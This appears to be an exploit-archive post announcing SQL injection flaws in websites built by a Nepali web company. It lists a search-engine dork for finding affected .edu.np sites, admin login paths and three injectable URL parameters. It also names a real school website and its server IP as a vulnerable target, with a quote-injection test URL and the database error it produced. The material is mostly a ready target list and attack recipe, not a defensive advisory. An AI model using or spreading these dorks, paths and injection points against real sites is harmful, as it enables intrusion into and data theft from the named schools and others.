facebook facebook twitter rss

Power By W3 IT Solution Web Company Nepal SQL Injection

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : Power By W3 IT Solution Web Company Nepal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : w3itsolution.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Power by W3 IT SOLUTION'' site:edu.np
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

##########################################################

# Admin Panel Login Path :
*************************

/home/admin_tansen_multiple/

/home/admin_[PATH]_multiple/

# SQL Injection Exploit :
**********************

/home/news.php?ID=[SQL Injection]

/home/gallery_details.php?catID=[SQL Injection]

/home/conn.php?ID=[SQL Injection]

##########################################################

# Example Vulnerable Site =>
**************************

Note => (72.29.65.177) => There are 540 domains hosted on this server.

[+] tansenmultiple.edu.np/home/news.php?ID=2%27 =>

[Proof of Concept] => archive.fo/aiRil

##########################################################

# SQL Database Error :
********************

Deprecated: mysql_connect(): The mysql extension is deprecated
and will be removed in the future: use mysqli or PDO instead in
/home/tansen/public_html/home/conn.php on line 2

##########################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :